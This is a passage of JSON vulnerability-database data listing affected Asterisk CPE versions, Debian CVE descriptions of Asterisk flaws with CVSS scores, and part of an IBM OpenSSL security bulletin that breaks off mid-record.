"cpe:2.3:a:asterisk:open_source:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc2:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc1:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc1:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-16T06:05:21", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon crash) via a crafted HTTP POST request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2686", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2686", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5642", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5641", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.", "cvss3": {}, "published": "2013-01-04T15:55:00", "type": "debiancve", "title": "CVE-2012-5977", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-01-04T15:55:00", "id": "DEBIANCVE:CVE-2012-5977", "href": "https://security-tracker.debian.org/tracker/CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.", "cvss3": {}, "published": "2013-01-04T11:52:00", "type": "debiancve", "title": "CVE-2012-5976", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-04T11:52:00", "id": "DEBIANCVE:CVE-2012-5976", "href": "https://security-tracker.debian.org/tracker/CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop.", "cvss3": {}, "published": "2013-12-19T22:55:00", "type": "debiancve", "title": "CVE-2013-7100", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-19T22:55:00", "id": "DEBIANCVE:CVE-2013-7100", "href": "https://security-tracker.debian.org/tracker/CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2685", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2685", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2264", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2022-09-29T18:25:40", "description": "## Abstract\n\nThree security vulnerabilities exist in the version of OpenSSL shipped with IBM Initiate Master Data Service and IBM InfoSphere Master Data Management Standard Edition. See the individual descriptions for the details.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n**CVE ID: **[_CVE-2013-0166_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2013-0166>) \n \n**DESCRIPTION: ** \nA flaw in the OpenSSL handling of OCSP response verification can be exploited in a denial of service attack. \n \n**CVSS:** \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/81904> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**CVE ID: **[_CVE-2013-0169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2013-0169>) \n \n**DESCRIPTION: ** \nA weakness in the handling of CBC ciphersuites in SSL, TLS and DTLS which could lead to plaintext recovery by exploiting timing differences arising during MAC processing. \n \n**_CVSS_****__:__** \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/81902> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n**CVE ID: **[_CVE-2012-2686_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2013-2686>) \n \n**DESCRIPTION: ** \nA flaw in the OpenSSL handling of CBC ciphersuites in TLS 1.1 and TLS 1.2 on AES-NI supporting platforms can be exploited in a DoS attack. \n \n**CVSS:** \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/81903> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**AFFECTED PRODUCTS:** \n \n\u00b7 IBM Initiate Master Data Service versions 9.5, and 9.7 \n\u00b7 IBM InfoSphere Master Data Management Standard Edition versions 10.0 and 10.1 \n\n\n**REMEDIATION: **\n\n**_Fixes:_**\n\n**Important Limitation:**\n\nResolution of the vulnerabilities in this security bulletin is accomplished by installing and using a later version of OpenSSL. On AIX, and on AIX only, the current version of OpenSSL has known breaking issues in TLS when FIPS mode is enabled. Based on this, FIPS mode is disabled when the version of OpenSSL included in the fixes below is installed for use by brokers on AIX. No change is made to the current configuration of FIPS mode for OpenSSL when installing the fixes below on any other operating system.\n\nAn attempt to enable FIPS mode for OpenSSL on AIX after installing the fixes below will result in a FIPS fingerprint error in the broker logs.\n\n\u00b7 For IBM Initiate Master Data Service version 9.5.\n\n \no Install \u201c[_September 2013 Fix Pack for v9.5 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=InfoSphere+Master+Data+Management&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=9.5&platform=All&function=all>)\u201d \n \n\u00b7 For IBM Initiate Master Data Service version 9.7. \no Install \u201c[_September 2013 Fix Pack for v9.7 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=InfoSphere+Master+Data+Management&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=9.7&platform=All&function=all>)\u201d \n \n\u00b7 For IBM InfoSphere Master Data Management Standard Edition version10.0 \no Install \u201c[_September 2013 Fix Pack for v10.0 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information+Management&product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=10.0&platform=All&function=all>)\u201d \n \n\u00b7 For IBM InfoSphere Master Data Management Standard Edition version 10.1 \no Install \u201c[_September 2013 Fix Pack for v10.1 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information+Management&product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=10.1&platform=All&function=all>)\u201d \n \n \n**_Workaround(s) & Mitigation(s):_** None known. \n \n \n**REFERENCES: ** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 _Complete CVSS Guide_](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 _On-line Calculator V2_](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>) \n \n**RELATED INFORMATION: ** \n\u00b7 [_IBM Secure Engineering Web Portal_](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n\u00b7 [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT: **None \n \n**CHANGE HISTORY: ** \ndd-mmm-yyyy Original version published \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"SSLVY3\",\"label\":\"Initiate Master Data Service\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not 